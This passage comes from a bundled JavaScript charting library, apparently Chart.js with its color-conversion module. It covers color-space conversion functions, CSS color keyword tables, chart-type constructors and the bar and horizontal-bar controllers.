return [r * 255, g * 255, b * 255];
}
function xyz2lab(xyz) {
var x = xyz[0],
y = xyz[1],
z = xyz[2],
l, a, b;
x /= 95.047;
y /= 100;
z /= 108.883;
x = x > 0.008856 ? Math.pow(x, 1 / 3) : (7.787 * x) + (16 / 116);
y = y > 0.008856 ? Math.pow(y, 1 / 3) : (7.787 * y) + (16 / 116);
z = z > 0.008856 ? Math.pow(z, 1 / 3) : (7.787 * z) + (16 / 116);
l = (116 * y) - 16;
a = 500 * (x - y);
b = 200 * (y - z);
return [l, a, b];
}
function xyz2lch(args) {
return lab2lch(xyz2lab(args));
}
function lab2xyz(lab) {
var l = lab[0],
a = lab[1],
b = lab[2],
x, y, z, y2;
if (l <= 8) {
y = (l * 100) / 903.3;
y2 = (7.787 * (y / 100)) + (16 / 116);
} else {
y = 100 * Math.pow((l + 16) / 116, 3);
y2 = Math.pow(y / 100, 1 / 3);
}
// compute the f-values first so the epsilon tests compare initialized values
// (the previous inline form read x and z before they were ever assigned)
var fx = (a / 500) + y2;
var fz = y2 - (b / 200);
x = Math.pow(fx, 3) > 0.008856 ? 95.047 * Math.pow(fx, 3) : (95.047 * (fx - (16 / 116))) / 7.787;
z = Math.pow(fz, 3) > 0.008856 ? 108.883 * Math.pow(fz, 3) : (108.883 * (fz - (16 / 116))) / 7.787;
return [x, y, z];
}
function lab2lch(lab) {
var l = lab[0],
a = lab[1],
b = lab[2],
hr, h, c;
hr = Math.atan2(b, a);
h = hr * 360 / 2 / Math.PI;
if (h < 0) {
h += 360;
}
c = Math.sqrt(a * a + b * b);
return [l, c, h];
}
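// lab2lch is a cartesian-to-polar change of coordinates: chroma c is the
// radius sqrt(a^2 + b^2) and hue h the angle of (a, b) in degrees, e.g.
// lab2lch([53, 80, 67]) is roughly [53, 104.4, 39.9].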
function lab2rgb(args) {
return xyz2rgb(lab2xyz(args));
}
function lch2lab(lch) {
var l = lch[0],
c = lch[1],
h = lch[2],
a, b, hr;
hr = h / 360 * 2 * Math.PI;
a = c * Math.cos(hr);
b = c * Math.sin(hr);
return [l, a, b];
}
function lch2xyz(args) {
return lab2xyz(lch2lab(args));
}
function lch2rgb(args) {
return lab2rgb(lch2lab(args));
}
function keyword2rgb(keyword) {
return cssKeywords[keyword];
}
function keyword2hsl(args) {
return rgb2hsl(keyword2rgb(args));
}
function keyword2hsv(args) {
return rgb2hsv(keyword2rgb(args));
}
function keyword2hwb(args) {
return rgb2hwb(keyword2rgb(args));
}
function keyword2cmyk(args) {
return rgb2cmyk(keyword2rgb(args));
}
function keyword2lab(args) {
return rgb2lab(keyword2rgb(args));
}
function keyword2xyz(args) {
return rgb2xyz(keyword2rgb(args));
}
var cssKeywords = {
aliceblue: [240, 248, 255],
antiquewhite: [250, 235, 215],
aqua: [0, 255, 255],
aquamarine: [127, 255, 212],
azure: [240, 255, 255],
beige: [245, 245, 220],
bisque: [255, 228, 196],
black: [0, 0, 0],
blanchedalmond: [255, 235, 205],
blue: [0, 0, 255],
blueviolet: [138, 43, 226],
brown: [165, 42, 42],
burlywood: [222, 184, 135],
cadetblue: [95, 158, 160],
chartreuse: [127, 255, 0],
chocolate: [210, 105, 30],
coral: [255, 127, 80],
cornflowerblue: [100, 149, 237],
cornsilk: [255, 248, 220],
crimson: [220, 20, 60],
cyan: [0, 255, 255],
darkblue: [0, 0, 139],
darkcyan: [0, 139, 139],
darkgoldenrod: [184, 134, 11],
darkgray: [169, 169, 169],
darkgreen: [0, 100, 0],
darkgrey: [169, 169, 169],
darkkhaki: [189, 183, 107],
darkmagenta: [139, 0, 139],
darkolivegreen: [85, 107, 47],
darkorange: [255, 140, 0],
darkorchid: [153, 50, 204],
darkred: [139, 0, 0],
darksalmon: [233, 150, 122],
darkseagreen: [143, 188, 143],
darkslateblue: [72, 61, 139],
darkslategray: [47, 79, 79],
darkslategrey: [47, 79, 79],
darkturquoise: [0, 206, 209],
darkviolet: [148, 0, 211],
deeppink: [255, 20, 147],
deepskyblue: [0, 191, 255],
dimgray: [105, 105, 105],
dimgrey: [105, 105, 105],
dodgerblue: [30, 144, 255],
firebrick: [178, 34, 34],
floralwhite: [255, 250, 240],
forestgreen: [34, 139, 34],
fuchsia: [255, 0, 255],
gainsboro: [220, 220, 220],
ghostwhite: [248, 248, 255],
gold: [255, 215, 0],
goldenrod: [218, 165, 32],
gray: [128, 128, 128],
green: [0, 128, 0],
greenyellow: [173, 255, 47],
grey: [128, 128, 128],
honeydew: [240, 255, 240],
hotpink: [255, 105, 180],
indianred: [205, 92, 92],
indigo: [75, 0, 130],
ivory: [255, 255, 240],
khaki: [240, 230, 140],
lavender: [230, 230, 250],
lavenderblush: [255, 240, 245],
lawngreen: [124, 252, 0],
lemonchiffon: [255, 250, 205],
lightblue: [173, 216, 230],
lightcoral: [240, 128, 128],
lightcyan: [224, 255, 255],
lightgoldenrodyellow: [250, 250, 210],
lightgray: [211, 211, 211],
lightgreen: [144, 238, 144],
lightgrey: [211, 211, 211],
lightpink: [255, 182, 193],
lightsalmon: [255, 160, 122],
lightseagreen: [32, 178, 170],
lightskyblue: [135, 206, 250],
lightslategray: [119, 136, 153],
lightslategrey: [119, 136, 153],
lightsteelblue: [176, 196, 222],
lightyellow: [255, 255, 224],
lime: [0, 255, 0],
limegreen: [50, 205, 50],
linen: [250, 240, 230],
magenta: [255, 0, 255],
maroon: [128, 0, 0],
mediumaquamarine: [102, 205, 170],
mediumblue: [0, 0, 205],
mediumorchid: [186, 85, 211],
mediumpurple: [147, 112, 219],
mediumseagreen: [60, 179, 113],
mediumslateblue: [123, 104, 238],
mediumspringgreen: [0, 250, 154],
mediumturquoise: [72, 209, 204],
mediumvioletred: [199, 21, 133],
midnightblue: [25, 25, 112],
mintcream: [245, 255, 250],
mistyrose: [255, 228, 225],
moccasin: [255, 228, 181],
navajowhite: [255, 222, 173],
navy: [0, 0, 128],
oldlace: [253, 245, 230],
olive: [128, 128, 0],
olivedrab: [107, 142, 35],
orange: [255, 165, 0],
orangered: [255, 69, 0],
orchid: [218, 112, 214],
palegoldenrod: [238, 232, 170],
palegreen: [152, 251, 152],
paleturquoise: [175, 238, 238],
palevioletred: [219, 112, 147],
papayawhip: [255, 239, 213],
peachpuff: [255, 218, 185],
peru: [205, 133, 63],
pink: [255, 192, 203],
plum: [221, 160, 221],
powderblue: [176, 224, 230],
purple: [128, 0, 128],
rebeccapurple: [102, 51, 153],
red: [255, 0, 0],
rosybrown: [188, 143, 143],
royalblue: [65, 105, 225],
saddlebrown: [139, 69, 19],
salmon: [250, 128, 114],
sandybrown: [244, 164, 96],
seagreen: [46, 139, 87],
seashell: [255, 245, 238],
sienna: [160, 82, 45],
silver: [192, 192, 192],
skyblue: [135, 206, 235],
slateblue: [106, 90, 205],
slategray: [112, 128, 144],
slategrey: [112, 128, 144],
snow: [255, 250, 250],
springgreen: [0, 255, 127],
steelblue: [70, 130, 180],
tan: [210, 180, 140],
teal: [0, 128, 128],
thistle: [216, 191, 216],
tomato: [255, 99, 71],
turquoise: [64, 224, 208],
violet: [238, 130, 238],
wheat: [245, 222, 179],
white: [255, 255, 255],
whitesmoke: [245, 245, 245],
yellow: [255, 255, 0],
yellowgreen: [154, 205, 50]
};
var reverseKeywords = {};
for (var key in cssKeywords) {
reverseKeywords[JSON.stringify(cssKeywords[key])] = key;
}
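// The reverse map keys on the JSON form of the triplet, so lookups are exact:
//   rgb2keyword([255, 0, 0]) // => 'red'
//   rgb2keyword([255, 0, 1]) // => undefined (no nearest-color matching)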
}, {}], 5: [function (require, module, exports) {
var conversions = require(4);
var convert = function () {
return new Converter();
};
for (var func in conversions) {
// export Raw versions
convert[func + "Raw"] = (function (func) {
// accept array or plain args
return function (arg) {
if (typeof arg == "number")
arg = Array.prototype.slice.call(arguments);
return conversions[func](arg);
}
})(func);
var pair = /(\w+)2(\w+)/.exec(func),
from = pair[1],
to = pair[2];
// export rgb2hsl and ["rgb"]["hsl"]
convert[from] = convert[from] || {};
convert[from][to] = convert[func] = (function (func) {
return function (arg) {
if (typeof arg == "number")
arg = Array.prototype.slice.call(arguments);
var val = conversions[func](arg);
if (typeof val == "string" || val === undefined)
return val; // keyword
for (var i = 0; i < val.length; i++)
val[i] = Math.round(val[i]);
return val;
}
})(func);
}
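// Sketch of the generated API, assuming this module is required as `convert`:
//   convert.rgb2hsl([10, 20, 30])    // => [210, 50, 8] (rounded)
//   convert.rgb2hslRaw([10, 20, 30]) // => [210, 50, 7.84...] (unrounded)
//   convert.rgb.hsl(10, 20, 30)      // plain arguments work too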
/* Converter does lazy conversion and caching */
var Converter = function () {
this.convs = {};
};
/* Either get the values for a space or
set the values for a space, depending on args */
Converter.prototype.routeSpace = function (space, args) {
var values = args[0];
if (values === undefined) {
// color.rgb()
return this.getValues(space);
}
// color.rgb(10, 10, 10)
if (typeof values == "number") {
values = Array.prototype.slice.call(args);
}
return this.setValues(space, values);
};
/* Set the values for a space, invalidating cache */
Converter.prototype.setValues = function (space, values) {
this.space = space;
this.convs = {};
this.convs[space] = values;
return this;
};
/* Get the values for a space. If there's already
a conversion for the space, fetch it, otherwise
compute it */
Converter.prototype.getValues = function (space) {
var vals = this.convs[space];
if (!vals) {
var fspace = this.space,
from = this.convs[fspace];
vals = convert[fspace][space](from);
this.convs[space] = vals;
}
return vals;
};
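// Usage sketch: results are cached per target space until setValues runs again.
//   var c = convert();  // fresh Converter
//   c.rgb(255, 0, 0);   // set the source space, clearing the cache
//   c.hsl();            // computes [0, 100, 50] and stores it in this.convs
//   c.hsl();            // second call is served straight from the cache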
["rgb", "hsl", "hsv", "cmyk", "keyword"].forEach(function (space) {
Converter.prototype[space] = function (vals) {
return this.routeSpace(space, arguments);
}
});
module.exports = convert;
}, {"4": 4}], 6: [function (require, module, exports) {
module.exports = {
"aliceblue": [240, 248, 255],
"antiquewhite": [250, 235, 215],
"aqua": [0, 255, 255],
"aquamarine": [127, 255, 212],
"azure": [240, 255, 255],
"beige": [245, 245, 220],
"bisque": [255, 228, 196],
"black": [0, 0, 0],
"blanchedalmond": [255, 235, 205],
"blue": [0, 0, 255],
"blueviolet": [138, 43, 226],
"brown": [165, 42, 42],
"burlywood": [222, 184, 135],
"cadetblue": [95, 158, 160],
"chartreuse": [127, 255, 0],
"chocolate": [210, 105, 30],
"coral": [255, 127, 80],
"cornflowerblue": [100, 149, 237],
"cornsilk": [255, 248, 220],
"crimson": [220, 20, 60],
"cyan": [0, 255, 255],
"darkblue": [0, 0, 139],
"darkcyan": [0, 139, 139],
"darkgoldenrod": [184, 134, 11],
"darkgray": [169, 169, 169],
"darkgreen": [0, 100, 0],
"darkgrey": [169, 169, 169],
"darkkhaki": [189, 183, 107],
"darkmagenta": [139, 0, 139],
"darkolivegreen": [85, 107, 47],
"darkorange": [255, 140, 0],
"darkorchid": [153, 50, 204],
"darkred": [139, 0, 0],
"darksalmon": [233, 150, 122],
"darkseagreen": [143, 188, 143],
"darkslateblue": [72, 61, 139],
"darkslategray": [47, 79, 79],
"darkslategrey": [47, 79, 79],
"darkturquoise": [0, 206, 209],
"darkviolet": [148, 0, 211],
"deeppink": [255, 20, 147],
"deepskyblue": [0, 191, 255],
"dimgray": [105, 105, 105],
"dimgrey": [105, 105, 105],
"dodgerblue": [30, 144, 255],
"firebrick": [178, 34, 34],
"floralwhite": [255, 250, 240],
"forestgreen": [34, 139, 34],
"fuchsia": [255, 0, 255],
"gainsboro": [220, 220, 220],
"ghostwhite": [248, 248, 255],
"gold": [255, 215, 0],
"goldenrod": [218, 165, 32],
"gray": [128, 128, 128],
"green": [0, 128, 0],
"greenyellow": [173, 255, 47],
"grey": [128, 128, 128],
"honeydew": [240, 255, 240],
"hotpink": [255, 105, 180],
"indianred": [205, 92, 92],
"indigo": [75, 0, 130],
"ivory": [255, 255, 240],
"khaki": [240, 230, 140],
"lavender": [230, 230, 250],
"lavenderblush": [255, 240, 245],
"lawngreen": [124, 252, 0],
"lemonchiffon": [255, 250, 205],
"lightblue": [173, 216, 230],
"lightcoral": [240, 128, 128],
"lightcyan": [224, 255, 255],
"lightgoldenrodyellow": [250, 250, 210],
"lightgray": [211, 211, 211],
"lightgreen": [144, 238, 144],
"lightgrey": [211, 211, 211],
"lightpink": [255, 182, 193],
"lightsalmon": [255, 160, 122],
"lightseagreen": [32, 178, 170],
"lightskyblue": [135, 206, 250],
"lightslategray": [119, 136, 153],
"lightslategrey": [119, 136, 153],
"lightsteelblue": [176, 196, 222],
"lightyellow": [255, 255, 224],
"lime": [0, 255, 0],
"limegreen": [50, 205, 50],
"linen": [250, 240, 230],
"magenta": [255, 0, 255],
"maroon": [128, 0, 0],
"mediumaquamarine": [102, 205, 170],
"mediumblue": [0, 0, 205],
"mediumorchid": [186, 85, 211],
"mediumpurple": [147, 112, 219],
"mediumseagreen": [60, 179, 113],
"mediumslateblue": [123, 104, 238],
"mediumspringgreen": [0, 250, 154],
"mediumturquoise": [72, 209, 204],
"mediumvioletred": [199, 21, 133],
"midnightblue": [25, 25, 112],
"mintcream": [245, 255, 250],
"mistyrose": [255, 228, 225],
"moccasin": [255, 228, 181],
"navajowhite": [255, 222, 173],
"navy": [0, 0, 128],
"oldlace": [253, 245, 230],
"olive": [128, 128, 0],
"olivedrab": [107, 142, 35],
"orange": [255, 165, 0],
"orangered": [255, 69, 0],
"orchid": [218, 112, 214],
"palegoldenrod": [238, 232, 170],
"palegreen": [152, 251, 152],
"paleturquoise": [175, 238, 238],
"palevioletred": [219, 112, 147],
"papayawhip": [255, 239, 213],
"peachpuff": [255, 218, 185],
"peru": [205, 133, 63],
"pink": [255, 192, 203],
"plum": [221, 160, 221],
"powderblue": [176, 224, 230],
"purple": [128, 0, 128],
"rebeccapurple": [102, 51, 153],
"red": [255, 0, 0],
"rosybrown": [188, 143, 143],
"royalblue": [65, 105, 225],
"saddlebrown": [139, 69, 19],
"salmon": [250, 128, 114],
"sandybrown": [244, 164, 96],
"seagreen": [46, 139, 87],
"seashell": [255, 245, 238],
"sienna": [160, 82, 45],
"silver": [192, 192, 192],
"skyblue": [135, 206, 235],
"slateblue": [106, 90, 205],
"slategray": [112, 128, 144],
"slategrey": [112, 128, 144],
"snow": [255, 250, 250],
"springgreen": [0, 255, 127],
"steelblue": [70, 130, 180],
"tan": [210, 180, 140],
"teal": [0, 128, 128],
"thistle": [216, 191, 216],
"tomato": [255, 99, 71],
"turquoise": [64, 224, 208],
"violet": [238, 130, 238],
"wheat": [245, 222, 179],
"white": [255, 255, 255],
"whitesmoke": [245, 245, 245],
"yellow": [255, 255, 0],
"yellowgreen": [154, 205, 50]
};
}, {}], 7: [function (require, module, exports) {
/**
* @namespace Chart
*/
var Chart = require(28)();
require(26)(Chart);
require(22)(Chart);
require(25)(Chart);
require(21)(Chart);
require(23)(Chart);
require(24)(Chart);
require(29)(Chart);
require(33)(Chart);
require(31)(Chart);
require(34)(Chart);
require(32)(Chart);
require(35)(Chart);
require(30)(Chart);
require(27)(Chart);
require(36)(Chart);
require(37)(Chart);
require(38)(Chart);
require(39)(Chart);
require(40)(Chart);
require(43)(Chart);
require(41)(Chart);
require(42)(Chart);
require(44)(Chart);
require(45)(Chart);
require(46)(Chart);
// Controllers must be loaded after elements
// See Chart.core.datasetController.dataElementType
require(15)(Chart);
require(16)(Chart);
require(17)(Chart);
require(18)(Chart);
require(19)(Chart);
require(20)(Chart);
require(8)(Chart);
require(9)(Chart);
require(10)(Chart);
require(11)(Chart);
require(12)(Chart);
require(13)(Chart);
require(14)(Chart);
window.Chart = module.exports = Chart;
}, {
"10": 10,
"11": 11,
"12": 12,
"13": 13,
"14": 14,
"15": 15,
"16": 16,
"17": 17,
"18": 18,
"19": 19,
"20": 20,
"21": 21,
"22": 22,
"23": 23,
"24": 24,
"25": 25,
"26": 26,
"27": 27,
"28": 28,
"29": 29,
"30": 30,
"31": 31,
"32": 32,
"33": 33,
"34": 34,
"35": 35,
"36": 36,
"37": 37,
"38": 38,
"39": 39,
"40": 40,
"41": 41,
"42": 42,
"43": 43,
"44": 44,
"45": 45,
"46": 46,
"8": 8,
"9": 9
}], 8: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Bar = function (context, config) {
config.type = 'bar';
return new Chart(context, config);
};
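// Sketch (assuming `ctx` is a canvas 2d context and `data` a chart config):
//   new Chart.Bar(ctx, {data: data});
// is just shorthand for:
//   new Chart(ctx, {type: 'bar', data: data});
// The other constructors in the following modules work the same way.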
};
}, {}], 9: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Bubble = function (context, config) {
config.type = 'bubble';
return new Chart(context, config);
};
};
}, {}], 10: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Doughnut = function (context, config) {
config.type = 'doughnut';
return new Chart(context, config);
};
};
}, {}], 11: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Line = function (context, config) {
config.type = 'line';
return new Chart(context, config);
};
};
}, {}], 12: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.PolarArea = function (context, config) {
config.type = 'polarArea';
return new Chart(context, config);
};
};
}, {}], 13: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Radar = function (context, config) {
config.type = 'radar';
return new Chart(context, config);
};
};
}, {}], 14: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var defaultConfig = {
hover: {
mode: 'single'
},
scales: {
xAxes: [{
type: 'linear', // scatter should not use a category axis
position: 'bottom',
id: 'x-axis-1' // need an ID so datasets can reference the scale
}],
yAxes: [{
type: 'linear',
position: 'left',
id: 'y-axis-1'
}]
},
tooltips: {
callbacks: {
title: function () {
// Title doesn't make sense for scatter since we format the data as a point
return '';
},
label: function (tooltipItem) {
return '(' + tooltipItem.xLabel + ', ' + tooltipItem.yLabel + ')';
}
}
}
};
// Register the default config for this type
Chart.defaults.scatter = defaultConfig;
// Scatter charts use line controllers
Chart.controllers.scatter = Chart.controllers.line;
Chart.Scatter = function (context, config) {
config.type = 'scatter';
return new Chart(context, config);
};
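// Scatter is configured rather than implemented here: it reuses the line
// controller with linear axes and point-style tooltips, so (assuming `ctx`
// and `data` as above) these are equivalent:
//   new Chart.Scatter(ctx, {data: data});
//   new Chart(ctx, {type: 'scatter', data: data});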
};
}, {}], 15: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.bar = {
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'category',
// Specific to Bar Controller
categoryPercentage: 0.8,
barPercentage: 0.9,
// grid line settings
gridLines: {
offsetGridLines: true
}
}],
yAxes: [{
type: 'linear'
}]
}
};
Chart.controllers.bar = Chart.DatasetController.extend({
dataElementType: Chart.elements.Rectangle,
initialize: function (chart, datasetIndex) {
Chart.DatasetController.prototype.initialize.call(this, chart, datasetIndex);
// Use this to indicate that this is a bar dataset.
this.getMeta().bar = true;
},
// Get the number of datasets that display bars. We use this to correctly calculate the bar width
getBarCount: function () {
var me = this;
var barCount = 0;
helpers.each(me.chart.data.datasets, function (dataset, datasetIndex) {
var meta = me.chart.getDatasetMeta(datasetIndex);
if (meta.bar && me.chart.isDatasetVisible(datasetIndex)) {
++barCount;
}
}, me);
return barCount;
},
update: function (reset) {
var me = this;
helpers.each(me.getMeta().data, function (rectangle, index) {
me.updateElement(rectangle, index, reset);
}, me);
},
updateElement: function (rectangle, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var scaleBase = yScale.getBasePixel();
var rectangleElementOptions = me.chart.options.elements.rectangle;
var custom = rectangle.custom || {};
var dataset = me.getDataset();
rectangle._xScale = xScale;
rectangle._yScale = yScale;
rectangle._datasetIndex = me.index;
rectangle._index = index;
var ruler = me.getRuler(index);
rectangle._model = {
x: me.calculateBarX(index, me.index, ruler),
y: reset ? scaleBase : me.calculateBarY(index, me.index),
// Tooltip
label: me.chart.data.labels[index],
datasetLabel: dataset.label,
// Appearance
base: reset ? scaleBase : me.calculateBarBase(me.index, index),
width: me.calculateBarWidth(ruler),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor),
borderSkipped: custom.borderSkipped ? custom.borderSkipped : rectangleElementOptions.borderSkipped,
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth)
};
rectangle.pivot();
},
calculateBarBase: function (datasetIndex, index) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var base = 0;
if (yScale.options.stacked) {
var chart = me.chart;
var datasets = chart.data.datasets;
var value = Number(datasets[datasetIndex].data[index]);
for (var i = 0; i < datasetIndex; i++) {
var currentDs = datasets[i];
var currentDsMeta = chart.getDatasetMeta(i);
if (currentDsMeta.bar && currentDsMeta.yAxisID === yScale.id && chart.isDatasetVisible(i)) {
var currentVal = Number(currentDs.data[index]);
base += value < 0 ? Math.min(currentVal, 0) : Math.max(currentVal, 0);
}
}
return yScale.getPixelForValue(base);
}
return yScale.getBasePixel();
},
getRuler: function (index) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var datasetCount = me.getBarCount();
var tickWidth;
if (xScale.options.type === 'category') {
tickWidth = xScale.getPixelForTick(index + 1) - xScale.getPixelForTick(index);
} else {
// Average width
tickWidth = xScale.width / xScale.ticks.length;
}
var categoryWidth = tickWidth * xScale.options.categoryPercentage;
var categorySpacing = (tickWidth - (tickWidth * xScale.options.categoryPercentage)) / 2;
var fullBarWidth = categoryWidth / datasetCount;
if (xScale.ticks.length !== me.chart.data.labels.length) {
var perc = xScale.ticks.length / me.chart.data.labels.length;
fullBarWidth = fullBarWidth * perc;
}
var barWidth = fullBarWidth * xScale.options.barPercentage;
var barSpacing = fullBarWidth - (fullBarWidth * xScale.options.barPercentage);
return {
datasetCount: datasetCount,
tickWidth: tickWidth,
categoryWidth: categoryWidth,
categorySpacing: categorySpacing,
fullBarWidth: fullBarWidth,
barWidth: barWidth,
barSpacing: barSpacing
};
},
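// Worked example of the ruler arithmetic: with tickWidth = 100,
// categoryPercentage = 0.8 and 2 visible bar datasets, categoryWidth = 80
// and categorySpacing = 10; fullBarWidth = 40, and barPercentage = 0.9 then
// gives barWidth = 36 and barSpacing = 4.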
calculateBarWidth: function (ruler) {
var xScale = this.getScaleForId(this.getMeta().xAxisID);
if (xScale.options.barThickness) {
return xScale.options.barThickness;
}
return xScale.options.stacked ? ruler.categoryWidth : ruler.barWidth;
},
// Get bar index from the given dataset index accounting for the fact that not all bars are visible
getBarIndex: function (datasetIndex) {
var barIndex = 0;
var meta, j;
for (j = 0; j < datasetIndex; ++j) {
meta = this.chart.getDatasetMeta(j);
if (meta.bar && this.chart.isDatasetVisible(j)) {
++barIndex;
}
}
return barIndex;
},
calculateBarX: function (index, datasetIndex, ruler) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var barIndex = me.getBarIndex(datasetIndex);
var leftTick = xScale.getPixelForValue(null, index, datasetIndex, me.chart.isCombo);
leftTick -= me.chart.isCombo ? (ruler.tickWidth / 2) : 0;
if (xScale.options.stacked) {
return leftTick + (ruler.categoryWidth / 2) + ruler.categorySpacing;
}
return leftTick +
(ruler.barWidth / 2) +
ruler.categorySpacing +
(ruler.barWidth * barIndex) +
(ruler.barSpacing / 2) +
(ruler.barSpacing * barIndex);
},
calculateBarY: function (index, datasetIndex) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var value = Number(me.getDataset().data[index]);
if (yScale.options.stacked) {
var sumPos = 0,
sumNeg = 0;
for (var i = 0; i < datasetIndex; i++) {
var ds = me.chart.data.datasets[i];
var dsMeta = me.chart.getDatasetMeta(i);
if (dsMeta.bar && dsMeta.yAxisID === yScale.id && me.chart.isDatasetVisible(i)) {
var stackedVal = Number(ds.data[index]);
if (stackedVal < 0) {
sumNeg += stackedVal || 0;
} else {
sumPos += stackedVal || 0;
}
}
}
if (value < 0) {
return yScale.getPixelForValue(sumNeg + value);
}
return yScale.getPixelForValue(sumPos + value);
}
return yScale.getPixelForValue(value);
},
draw: function (ease) {
var me = this;
var easingDecimal = ease || 1;
var metaData = me.getMeta().data;
var dataset = me.getDataset();
var i, len;
for (i = 0, len = metaData.length; i < len; ++i) {
var d = dataset.data[i];
if (d !== null && d !== undefined && !isNaN(d)) {
metaData[i].transition(easingDecimal).draw();
}
}
},
setHoverStyle: function (rectangle) {
var dataset = this.chart.data.datasets[rectangle._datasetIndex];
var index = rectangle._index;
var custom = rectangle.custom || {};
var model = rectangle._model;
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : helpers.getValueAtIndexOrDefault(dataset.hoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : helpers.getValueAtIndexOrDefault(dataset.hoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : helpers.getValueAtIndexOrDefault(dataset.hoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (rectangle) {
var dataset = this.chart.data.datasets[rectangle._datasetIndex];
var index = rectangle._index;
var custom = rectangle.custom || {};
var model = rectangle._model;
var rectangleElementOptions = this.chart.options.elements.rectangle;
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth);
}
});
// including horizontalBar in the bar file, instead of a file of its own
// it extends bar (like pie extends doughnut)
Chart.defaults.horizontalBar = {
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'linear',
position: 'bottom'
}],
yAxes: [{
position: 'left',
type: 'category',
// Specific to Horizontal Bar Controller
categoryPercentage: 0.8,
barPercentage: 0.9,
// grid line settings
gridLines: {
offsetGridLines: true
}
}]
},
elements: {
rectangle: {
borderSkipped: 'left'
}
},
tooltips: {
callbacks: {
title: function (tooltipItems, data) {
// Pick first xLabel for now
var title = '';
if (tooltipItems.length > 0) {
if (tooltipItems[0].yLabel) {
title = tooltipItems[0].yLabel;
} else if (data.labels.length > 0 && tooltipItems[0].index < data.labels.length) {
title = data.labels[tooltipItems[0].index];
}
}
return title;
},
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
return datasetLabel + ': ' + tooltipItem.xLabel;
}
}
}
};
Chart.controllers.horizontalBar = Chart.controllers.bar.extend({
updateElement: function (rectangle, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var scaleBase = xScale.getBasePixel();
var custom = rectangle.custom || {};
var dataset = me.getDataset();
var rectangleElementOptions = me.chart.options.elements.rectangle;
rectangle._xScale = xScale;
rectangle._yScale = yScale;
rectangle._datasetIndex = me.index;
rectangle._index = index;
var ruler = me.getRuler(index);
rectangle._model = {
x: reset ? scaleBase : me.calculateBarX(index, me.index),
y: me.calculateBarY(index, me.index, ruler),
// Tooltip
label: me.chart.data.labels[index],
datasetLabel: dataset.label,
// Appearance
base: reset ? scaleBase : me.calculateBarBase(me.index, index),
height: me.calculateBarHeight(ruler),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor),
borderSkipped: custom.borderSkipped ? custom.borderSkipped : rectangleElementOptions.borderSkipped,
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth)
};
rectangle.draw = function () {
var ctx = this._chart.ctx;
var vm = this._view;
var halfHeight = vm.height / 2,
topY = vm.y - halfHeight,
bottomY = vm.y + halfHeight,
right = vm.base - (vm.base - vm.x),
halfStroke = vm.borderWidth / 2;
// Canvas doesn't allow us to stroke inside the width so we can
// adjust the sizes to fit if we're setting a stroke on the line
if (vm.borderWidth) {
topY += halfStroke;
bottomY -= halfStroke;
right += halfStroke;
}
ctx.beginPath();
ctx.fillStyle = vm.backgroundColor;
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
// Corner points, from bottom-left to bottom-right clockwise
// | 1 2 |
// | 0 3 |
var corners = [
[vm.base, bottomY],
[vm.base, topY],
[right, topY],
[right, bottomY]
];
// Find first (starting) corner with fallback to 'bottom'
var borders = ['bottom', 'left', 'top', 'right'];
var startCorner = borders.indexOf(vm.borderSkipped, 0);
if (startCorner === -1) {
startCorner = 0;
}
function cornerAt(cornerIndex) {
return corners[(startCorner + cornerIndex) % 4];
}
// Draw rectangle from 'startCorner'
ctx.moveTo.apply(ctx, cornerAt(0));
for (var i = 1; i < 4; i++) {
ctx.lineTo.apply(ctx, cornerAt(i));
}
ctx.fill();
if (vm.borderWidth) {
ctx.stroke();
}
};
rectangle.pivot();
},
calculateBarBase: function (datasetIndex, index) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var base = 0;
